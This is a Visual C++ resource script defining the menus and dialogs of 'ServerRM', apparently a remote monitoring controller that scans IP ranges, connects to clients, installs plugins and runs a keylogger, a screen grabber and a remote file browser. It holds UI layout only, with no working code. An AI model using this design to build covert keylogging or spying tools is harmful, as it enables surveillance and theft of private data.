// Microsoft Visual C++ generated resource script.
//
#include "ResServerRM.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// English (U.S.) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
#ifdef _WIN32
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
#pragma code_page(1252)
#endif //_WIN32

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "ResServerRM.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#include ""afxres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Menu
//

IDM_MAIN_WINDOW MENU 
BEGIN
    POPUP "&Server Config"
    BEGIN
        POPUP "&Client DB"
        BEGIN
            MENUITEM "&Add...",                     IDM_CLIENTDB_ADD
            MENUITEM "&Remove...",                  IDM_CLIENTDB_REMOVE
            MENUITEM "&View Clients...",            IDM_CLIENTDB_VIEWCLIENTS
        END
        POPUP "&Plugin DB"
        BEGIN
            MENUITEM "&Add..",                      IDM_PLUGINDB_ADD
            MENUITEM "&Remove...",                  IDM_PLUGINDB_REMOVE
            MENUITEM "&View Plugins...",            IDM_PLUGINDB_VIEWPLUGINS
        END
        MENUITEM SEPARATOR
        MENUITEM "E&xit",                       IDM_SERVERCONFIG_EXIT
    END
    POPUP "&Monitor"
    BEGIN
        MENUITEM "Scan IP Addresses...",        IDM_MONITOR_SCAN_IP
        MENUITEM "&Connect...",                 IDM_MONITOR_CONNECT
        MENUITEM SEPARATOR
        MENUITEM "&Install Plugin...",          IDM_MONITOR_INSTALLPLUGIN, GRAYED
        MENUITEM "&Uninstall Plugin...",        IDM_MONITOR_UNINSTALLPLUGIN, GRAYED
        POPUP "&Launch Plugin"
        BEGIN
            MENUITEM "&KLM...",                     IDM_LAUNCHPLUGIN_KLM
            MENUITEM "&SGM...",                     IDM_LAUNCHPLUGIN_SGM
            MENUITEM "&FBM...",                     IDM_LAUNCHPLUGIN_FBM
        END
        MENUITEM SEPARATOR
        MENUITEM "&Disconnect...",              IDM_MONITOR_DISCONNECT
    END
    POPUP "&Help"
    BEGIN
        MENUITEM "&Contents",                   IDM_HELP_CONTENTS, GRAYED
        MENUITEM "&About",                      IDM_HELP_ABOUT
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// Icon
//

// Icon with lowest ID value placed first to ensure application icon
// remains consistent on all systems.
IDC_MAIN_WINDOW         ICON                    "icon1.ico"
IDI_FOLDER_CLOSED       ICON                    "icon2.ico"
IDI_FOLDER_OPEN         ICON                    "icon3.ico"

/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_VIEW_PLUGINS DIALOGEX 0, 0, 264, 119
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "View Plugins"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_VIEW_REM_PLUGINS_LIST,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,18,250,75
    DEFPUSHBUTTON   "&OK",IDB_VIEW_PLUGINS_OK,105,99,50,14
    LTEXT           "Plugins in Database:",IDC_STATIC,7,7,66,8
END

IDD_VIEW_CLIENTS DIALOGEX 0, 0, 189, 126
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "View Clients"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_VIEW_REM_CLIENTS_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_SHOWSELALWAYS | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,18,175,81
    PUSHBUTTON      "&Edit",IDB_VIEW_CLIENTS_EDIT,39,106,50,14
    DEFPUSHBUTTON   "&OK",IDB_VIEW_CLIENTS_OK,99,106,50,14
    LTEXT           "Clients in Database:",IDC_STATIC,7,7,65,8
END

IDD_REM_PLUGIN DIALOGEX 0, 0, 264, 119
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Remove Plugin"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_VIEW_REM_PLUGINS_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,18,250,75
    PUSHBUTTON      "&Remove",IDB_REMOVE_PLUGIN,69,99,50,14
    DEFPUSHBUTTON   "&Cancel",IDB_REM_PLUGIN_CANCEL,136,99,50,14
    LTEXT           "Plugins in Database:",IDC_STATIC,7,7,66,8
END

IDD_REM_CLIENT DIALOGEX 0, 0, 189, 126
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Remove Client"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_VIEW_REM_CLIENTS_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,18,175,75
    PUSHBUTTON      "&Remove",IDB_REMOVE_CLIENT,36,104,50,14
    DEFPUSHBUTTON   "&Cancel",IDB_REM_CLIENT_CANCEL,103,104,50,14
    LTEXT           "Clients in Database:",IDC_STATIC,7,7,65,8
END

IDD_CONNECT_TO DIALOGEX 0, 0, 226, 140
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION
CAPTION "Connect To"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_CONNECT_TO_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,26,25,175,75
    DEFPUSHBUTTON   "C&onnect",IDB_CONNECT_TO,54,115,50,14
    PUSHBUTTON      "&Cancel",IDB_CONNECT_CANCEL,121,115,50,14
    LTEXT           "Clients in Database:",IDC_STATIC,26,15,65,8
END

IDD_ADD_PLUGIN DIALOGEX 0, 0, 226, 140
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Add New Plugin"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_ADD_PLUGIN_PID,63,23,97,14
    EDITTEXT        IDC_ADD_PLUGIN_PATH,63,44,97,14
    PUSHBUTTON      "&Browse...",IDB_ADD_PLUGIN_BROWSE,163,44,50,14,WS_DISABLED
    EDITTEXT        IDC_ADD_PLUGIN_NAME,63,65,97,14
    EDITTEXT        IDC_ADD_PLUGIN_IF_NAME,63,86,97,14
    DEFPUSHBUTTON   "&Add",IDB_ADD_PLUGIN_ADD,54,115,50,14
    PUSHBUTTON      "&Cancel",IDB_ADD_PLUGIN_CANCEL,121,115,50,14
    RTEXT           "Path:",IDC_STATIC,42,44,18,8,SS_CENTERIMAGE
    RTEXT           "Plugin Name:",IDC_STATIC,18,66,42,8,SS_CENTERIMAGE
    LTEXT           "Interface Name:",IDC_STATIC,7,88,54,8
    LTEXT           ".dll",IDC_STATIC,163,69,10,8
    LTEXT           ".dll",IDC_STATIC,163,91,10,8
    RTEXT           "Plugin ID:",IDC_STATIC,28,26,32,8,SS_CENTERIMAGE
END

IDD_ADD_CLIENT DIALOGEX 0, 0, 226, 140
STYLE DS_ABSALIGN | DS_SETFONT | DS_MODALFRAME | DS_3DLOOK | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Add Client"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_ADD_CLIENT_IP,"SysIPAddress32",WS_TABSTOP,97,30,100,15
    EDITTEXT        IDC_ADD_CLIENT_NAME,97,61,100,15,ES_AUTOHSCROLL
    PUSHBUTTON      "&Add",IDB_ADD_CLIENT_ADD,24,110,50,14,BS_CENTER | BS_VCENTER
    PUSHBUTTON      "&Reset",IDB_ADD_CLIENT_RESET,88,110,50,14,BS_CENTER | BS_VCENTER
    DEFPUSHBUTTON   "&Cancel",IDB_ADD_CLIENT_CANCEL,152,110,50,14,BS_CENTER | BS_VCENTER
    RTEXT           "Enter Nick Name:",IDC_STATIC,28,61,58,15,SS_CENTERIMAGE
    RTEXT           "Enter IP Address:",IDC_STATIC,28,30,58,15,SS_CENTERIMAGE
END

IDD_KLM_RT DIALOGEX 0, 0, 336, 258
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_KLM_RT_EDIT_SEARCH,7,17,100,14,ES_AUTOHSCROLL
    PUSHBUTTON      "&Find",IDB_KLM_RT_FINDNEXT,113,17,50,14
    CONTROL         "",IDC_KLM_RT_TREE,"SysTreeView32",TVS_HASBUTTONS | TVS_HASLINES | TVS_LINESATROOT | TVS_SHOWSELALWAYS | WS_BORDER | WS_HSCROLL | WS_TABSTOP,7,38,155,192
    PUSHBUTTON      "&Start",IDB_KLM_RT_START,22,236,50,14
    PUSHBUTTON      "S&top",IDB_KLM_RT_STOP,94,236,50,14,WS_DISABLED
    EDITTEXT        IDC_KLM_RT_EDIT_ATITLE,176,26,152,21,ES_CENTER | ES_AUTOHSCROLL | ES_READONLY
    EDITTEXT        IDC_KLM_RT_EDIT_KEYS,176,65,152,165,ES_MULTILINE | ES_READONLY | WS_VSCROLL
    LTEXT           "Window Title:",IDC_STATIC,176,16,44,8
    LTEXT           "Keys Pressed:",IDC_STATIC,176,54,46,8
END

IDD_KLM_RETRIEVE DIALOGEX 0, 0, 336, 258
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_KLM_RET_FROMDATE,"SysDateTimePick32",DTS_RIGHTALIGN | WS_TABSTOP,140,71,100,15
    CONTROL         "",IDC_KLM_RET_TODATE,"SysDateTimePick32",DTS_RIGHTALIGN | WS_TABSTOP,140,97,100,15
    PUSHBUTTON      "&Get Files",IDB_KLM_RET_GETFILES,140,123,50,14
    PUSHBUTTON      "S&top",IDB_KLM_RET_STOP,254,177,50,14,WS_DISABLED
    LTEXT           "From Date:",IDC_STATIC,93,73,37,8,0,WS_EX_RIGHT
    LTEXT           "To Date:",IDC_STATIC,101,99,29,8,0,WS_EX_RIGHT
    CONTROL         "",IDC_KLM_RET_PROGRESS,"msctls_progress32",WS_BORDER,30,178,216,13
    CONTROL         "Download Status",IDC_KLM_RET_STATIC,"Static",SS_LEFTNOWORDWRAP | NOT WS_VISIBLE | WS_GROUP,30,167,200,8
END

IDD_KLM_OFFLINE DIALOGEX 0, 0, 336, 258
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    COMBOBOX        IDC_KLM_OFF_COMBO,7,17,109,106,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    PUSHBUTTON      "&Build",IDB_KLM_OFF_BUILD,120,17,50,14,WS_DISABLED
    EDITTEXT        IDC_KLM_OFF_EDIT_SEARCH,7,38,110,14,ES_AUTOHSCROLL
    PUSHBUTTON      "&Find",IDB_KLM_OFF_FINDNEXT,120,38,50,14
    CONTROL         "",IDC_KLM_OFF_TREE,"SysTreeView32",TVS_HASBUTTONS | TVS_HASLINES | TVS_LINESATROOT | TVS_SHOWSELALWAYS | WS_BORDER | WS_HSCROLL | WS_TABSTOP,7,57,155,175
    PUSHBUTTON      "S&top",IDB_KLM_OFF_STOP,64,237,50,14
    EDITTEXT        IDC_KLM_OFF_EDIT_ATITLE,176,25,152,21,ES_CENTER | ES_AUTOHSCROLL | ES_READONLY
    EDITTEXT        IDC_KLM_OFF_EDIT_KEYS,176,64,152,166,ES_MULTILINE | ES_READONLY | WS_VSCROLL
    LTEXT           "Window Title:",IDC_STATIC,175,16,44,8
    LTEXT           "Keys Pressed:",IDC_STATIC,176,54,46,8
END

IDD_KLM_CONFIG DIALOGEX 0, 0, 336, 258
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_KLM_CONFIG_RT_INT,51,36,74,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_KLM_CONFIG_OFF_INT,187,36,74,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_KLM_CONFIG_ADD_APP,7,84,138,14,ES_AUTOHSCROLL
    PUSHBUTTON      "&Add",IDB_KLM_CONFIG_ADD,156,84,50,14
    PUSHBUTTON      "&Update Remote",IDB_KLM_CONFIG_UREMOTE,268,236,60,14
    LTEXT           "RealTime Log Interval:",IDC_STATIC,51,25,73,8
    LTEXT           "Offline Log Interval:",IDC_STATIC,187,25,66,8
    LTEXT           "Add A New Application:",IDC_STATIC,9,73,76,8
    LTEXT           "Monitored Applications:",IDC_STATIC,7,102,76,8
    LTEXT           "Seconds",IDC_STATIC,127,40,28,8
    LTEXT           "Minutes",IDC_STATIC,263,40,26,8
    CONTROL         "",IDC_KLM_CONFIG_APP_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_SHOWSELALWAYS | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,111,322,120
END

IDD_KLM DIALOGEX 0, 0, 355, 305
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "KeyLogger Monitor"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "Cancel",IDC_KLM_CANCEL,298,284,50,14,NOT WS_TABSTOP
    CONTROL         "",IDC_KLM_TAB,"SysTabControl32",0x0,7,7,341,275
END

IDD_SGM DIALOGEX 0, 0, 396, 308
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Screen Grabber Monitor"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "Cancel",IDB_SGM_CANCEL,339,287,50,14,NOT WS_TABSTOP
    CONTROL         "",IDC_SGM_TAB,"SysTabControl32",0x0,7,7,382,272
END

IDD_SGM_RT DIALOGEX 0, 0, 375, 255
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    COMBOBOX        IDC_SGM_RT_COMBO,75,7,100,72,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    DEFPUSHBUTTON   "Start",IDB_SGM_RT_START,181,6,50,14
    CONTROL         "",IDC_SGM_RT_TREE,"SysTreeView32",TVS_SHOWSELALWAYS | WS_BORDER | WS_HSCROLL | WS_TABSTOP,7,26,125,205
    PUSHBUTTON      "Stop",IDB_SGM_RT_STOP,48,234,50,14,WS_DISABLED
    PUSHBUTTON      "First",IDB_SGM_RT_FIRST,185,234,30,14,BS_CENTER
    PUSHBUTTON      "Prev",IDB_SGM_RT_PREV,223,234,30,14,BS_CENTER
    PUSHBUTTON      "Next",IDB_SGM_RT_NEXT,261,234,30,14,BS_CENTER
    PUSHBUTTON      "Last",IDB_SGM_RT_LAST,299,234,30,14,BS_CENTER
    LTEXT           "Choose Application:",IDC_STATIC,7,9,64,8
    CONTROL         "",IDC_SGM_RT_IMG,"Static",SS_BITMAP | SS_CENTERIMAGE | WS_BORDER,138,26,230,205
    LTEXT           "Downloading shot(s)...",IDC_SGM_RT_STATUS,11,221,101,8,NOT WS_VISIBLE
END

IDD_SGM_OFFLINE DIALOGEX 0, 0, 375, 255
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_SGM_OFF_TREE,"SysTreeView32",TVS_HASBUTTONS | TVS_HASLINES | TVS_LINESATROOT | TVS_SHOWSELALWAYS | WS_BORDER | WS_HSCROLL | WS_TABSTOP,7,25,126,205
    PUSHBUTTON      "First",IDC_SGM_OFF_FIRST,169,234,30,14
    PUSHBUTTON      "Prev",IDC_SGM_OFF_PREV,212,234,30,14
    PUSHBUTTON      "Next",IDC_SGM_OFF_NEXT,255,234,30,14
    PUSHBUTTON      "Last",IDC_SGM_OFF_LAST,298,234,30,14
    CONTROL         "",IDC_SGM_OFF_STATIC,"Static",SS_BITMAP | SS_CENTERIMAGE | WS_BORDER | WS_GROUP,139,25,229,206,WS_EX_STATICEDGE
    LTEXT           "Available Images:",IDC_STATIC,7,15,58,8
    LTEXT           "Image Display:",IDC_STATIC,141,15,48,8
END

IDD_SGM_RETRIEVE DIALOGEX 0, 0, 375, 255
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_SGM_RET_APPLIST,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,111,36,181,106
    CONTROL         "",IDC_SGM_RET_FROMDATE,"SysDateTimePick32",DTS_RIGHTALIGN | WS_TABSTOP,69,162,85,15
    CONTROL         "",IDC_SGM_RET_TODATE,"SysDateTimePick32",DTS_RIGHTALIGN | WS_TABSTOP,194,161,85,15
    DEFPUSHBUTTON   "&Retrieve",IDB_SGM_RET_RETRIEVE,295,161,50,14
    PUSHBUTTON      "S&top",IDB_SGM_RET_STOP,295,200,50,14,WS_DISABLED
    LTEXT           "Choose Application:",IDC_STATIC,111,25,64,8
    LTEXT           "From Date:",IDC_STATIC,31,165,37,8,SS_CENTERIMAGE
    LTEXT           "To Date:",IDC_STATIC,164,164,29,8,SS_CENTERIMAGE
    CONTROL         "",IDC_SGM_RET_PROGRESS,"msctls_progress32",WS_BORDER,31,200,250,14
    CONTROL         "Download Status",IDC_SGM_RET_STATIC,"Static",SS_LEFTNOWORDWRAP | NOT WS_VISIBLE | WS_GROUP,31,190,200,8
END

IDD_SGM_CONFIG DIALOGEX 0, 0, 375, 255
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_SGM_CONFIG_RT_INT,67,25,74,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_SGM_CONFIG_OFF_INT,193,26,74,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_SGM_CONFIG_ADD_APP,17,68,95,14,ES_AUTOHSCROLL
    CONTROL         "Application Shot",IDC_SGM_CONFIG_AS,"Button",BS_AUTORADIOBUTTON | WS_TABSTOP,120,71,67,10
    PUSHBUTTON      "&Add",IDB_SGM_CONFIG_ADD,312,68,50,14
    CONTROL         "",IDC_SGM_CONFIG_APPLIST,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,111,361,113
    DEFPUSHBUTTON   "&Update Remote",IDB_SGM_CONFIG_UREMOTE,308,234,60,14
    CONTROL         "Mouse Shot",IDC_SGM_CONFIG_MS,"Button",BS_AUTORADIOBUTTON | WS_TABSTOP,187,71,53,10
    CONTROL         "Fullscreen Shot",IDC_SGM_CONFIG_FS,"Button",BS_AUTORADIOBUTTON | WS_TABSTOP,241,71,65,10
    LTEXT           "RealTime Shots Interval:",IDC_STATIC,67,14,80,8
    LTEXT           "Offline Shots Interval:",IDC_STATIC,193,14,72,8
    LTEXT           "Monitored Applications:",IDC_STATIC,7,98,76,8
    GROUPBOX        "Add A New Application:",IDC_STATIC,7,54,361,39
    LTEXT           "Seconds",IDC_STATIC,143,27,38,8
    LTEXT           "Minutes",IDC_STATIC,270,28,38,8
END

IDD_FBM DIALOGEX 0, 0, 396, 308
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "File Browser Monitor"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_FBM_TAB,"SysTabControl32",0x0,7,7,382,272
    PUSHBUTTON      "Cancel",IDB_FBM_CANCEL,339,287,50,14,NOT WS_TABSTOP
END

IDD_FBM_UI DIALOGEX 0, 0, 375, 255
STYLE DS_SETFONT | DS_FIXEDSYS | DS_CONTROL | WS_CHILD
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "Start",IDB_FBM_UI_START,39,234,50,14
    CONTROL         "",IDC_FBM_UI_TREE,"SysTreeView32",TVS_HASBUTTONS | TVS_LINESATROOT | TVS_SHOWSELALWAYS | WS_BORDER | WS_HSCROLL | WS_TABSTOP,7,24,126,205
    CONTROL         "",IDC_FBM_UI_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,136,24,232,205
    PUSHBUTTON      "Copy File",IDB_FBM_UI_COPY,255,234,50,14
    PUSHBUTTON      "Cancel Copy",IDB_FBM_UI_CANCEL_COPY,319,234,50,14,WS_DISABLED
    LTEXT           "Folders:",IDC_STATIC,7,14,27,8
    LTEXT           "Files:",IDC_STATIC,137,14,18,8
    LTEXT           "Download Status",IDC_FBM_UI_STATIC,136,235,95,8,NOT WS_VISIBLE
END

IDD_SCAN_IP_ADDR DIALOGEX 0, 0, 226, 140
STYLE DS_ABSALIGN | DS_SETFONT | DS_MODALFRAME | DS_3DLOOK | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Scan IP Addresses"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_SCAN_IP_ADDR_FROM,"SysIPAddress32",WS_TABSTOP,94,28,100,15
    CONTROL         "",IDC_SCAN_IP_ADDR_TO,"SysIPAddress32",WS_TABSTOP,94,58,100,15
    PUSHBUTTON      "&Scan",IDB_SCAN_IP_ADDR_SCAN,24,110,50,14,BS_CENTER | BS_VCENTER
    PUSHBUTTON      "&Reset",IDB_SCAN_IP_ADDR_RESET,88,110,50,14,BS_CENTER | BS_VCENTER
    DEFPUSHBUTTON   "&Cancel",IDB_SCAN_IP_ADDR_CANCEL,152,110,50,14,BS_CENTER | BS_VCENTER
    RTEXT           "To IP Address:",IDC_STATIC,40,61,48,8,SS_CENTERIMAGE
    RTEXT           "From IP Address:",IDC_STATIC,32,31,56,8,SS_CENTERIMAGE
    LTEXT           "Scanning, please be patient. This could take a long time depending on the range of IP addresses...",IDC_SCAN_IP_ADDR_STATIC,49,79,125,27,NOT WS_VISIBLE
END

IDD_SCAN_IP_RESULT DIALOGEX 0, 0, 264, 126
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Scan Results"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_SCAN_IP_RESULT_LIST,"SysListView32",LVS_REPORT | LVS_SINGLESEL | LVS_SHOWSELALWAYS | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,18,250,81
    PUSHBUTTON      "&Add",IDB_SCAN_IP_RESULT_ADD,43,106,50,14
    DEFPUSHBUTTON   "&Cancel",IDB_SCAN_IP_RESULT_CANCEL,169,106,50,14
    LTEXT           "Active Clients:",IDC_STATIC,7,7,47,8
    PUSHBUTTON      "&Connect",IDB_SCAN_IP_RESULT_CONNECT,106,106,50,14
END

IDD_EDIT_NICKNAME DIALOGEX 0, 0, 165, 66
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Edit Nick Name"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_EDIT_NICKNAME_EDIT,62,11,96,14,ES_AUTOHSCROLL
    DEFPUSHBUTTON   "&OK",IDB_EDIT_NICKNAME_OK,25,46,50,14
    PUSHBUTTON      "&Cancel",IDB_EDIT_NICKNAME_CANCEL,83,46,50,14
    LTEXT           "Enter Nickname:",IDC_STATIC,7,14,53,8
END

IDD_ABOUT DIALOGEX 0, 0, 177, 159
STYLE DS_ABSALIGN | DS_SETFONT | DS_MODALFRAME | DS_3DLOOK | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "About ServerRM"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "&OK",IDB_ABOUT_OK,64,137,50,14
    LTEXT           "about, Version 1.0",IDC_STATIC,31,27,70,9
    LTEXT           "Shishir Bhat",IDC_STATIC,31,63,52,8
    LTEXT           "Srivathsa R",IDC_STATIC,31,72,52,8
    LTEXT           "Harsha Kadekar B M",IDC_STATIC,31,80,65,8
    LTEXT           "Coders:",IDC_STATIC,31,51,26,8
    CONTROL         "",IDC_ABOUT_LOGO,"Static",SS_BITMAP | SS_CENTERIMAGE | SS_REALSIZEIMAGE,7,7,95,20
END


/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO 
BEGIN
    IDD_VIEW_PLUGINS, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 257
        TOPMARGIN, 7
        BOTTOMMARGIN, 112
    END

    IDD_VIEW_CLIENTS, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 182
        TOPMARGIN, 7
        BOTTOMMARGIN, 120
    END

    IDD_REM_PLUGIN, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 257
        TOPMARGIN, 7
        BOTTOMMARGIN, 112
    END

    IDD_REM_CLIENT, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 182
        TOPMARGIN, 7
        BOTTOMMARGIN, 119
    END

    IDD_CONNECT_TO, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 219
        TOPMARGIN, 7
        BOTTOMMARGIN, 133
    END

    IDD_ADD_PLUGIN, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 219
        TOPMARGIN, 7
        BOTTOMMARGIN, 133
    END

    IDD_ADD_CLIENT, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 219
        TOPMARGIN, 7
        BOTTOMMARGIN, 132
    END

    IDD_KLM_RT, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 329
        TOPMARGIN, 7
        BOTTOMMARGIN, 250
    END

    IDD_KLM_RETRIEVE, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 329
        TOPMARGIN, 7
        BOTTOMMARGIN, 251
    END

    IDD_KLM_OFFLINE, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 329
        TOPMARGIN, 7
        BOTTOMMARGIN, 251
    END

    IDD_KLM_CONFIG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 329
        TOPMARGIN, 7
        BOTTOMMARGIN, 251
    END

    IDD_KLM, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 348
        TOPMARGIN, 7
        BOTTOMMARGIN, 298
    END

    IDD_SGM, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 389
        TOPMARGIN, 7
        BOTTOMMARGIN, 301
    END

    IDD_SGM_RT, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 368
        TOPMARGIN, 7
        BOTTOMMARGIN, 248
    END

    IDD_SGM_OFFLINE, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 368
        TOPMARGIN, 7
        BOTTOMMARGIN, 248
    END

    IDD_SGM_RETRIEVE, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 368
        TOPMARGIN, 7
        BOTTOMMARGIN, 248
    END

    IDD_SGM_CONFIG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 368
        TOPMARGIN, 7
        BOTTOMMARGIN, 248
    END

    IDD_FBM, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 389
        TOPMARGIN, 7
        BOTTOMMARGIN, 301
    END

    IDD_FBM_UI, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 368
        TOPMARGIN, 7
        BOTTOMMARGIN, 248
    END

    IDD_SCAN_IP_ADDR, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 219
        TOPMARGIN, 7
        BOTTOMMARGIN, 132
    END

    IDD_SCAN_IP_RESULT, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 257
        TOPMARGIN, 7
        BOTTOMMARGIN, 120
    END

    IDD_EDIT_NICKNAME, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 158
        TOPMARGIN, 7
        BOTTOMMARGIN, 60
    END

    IDD_ABOUT, DIALOG
    BEGIN
        LEFTMARGIN, 7
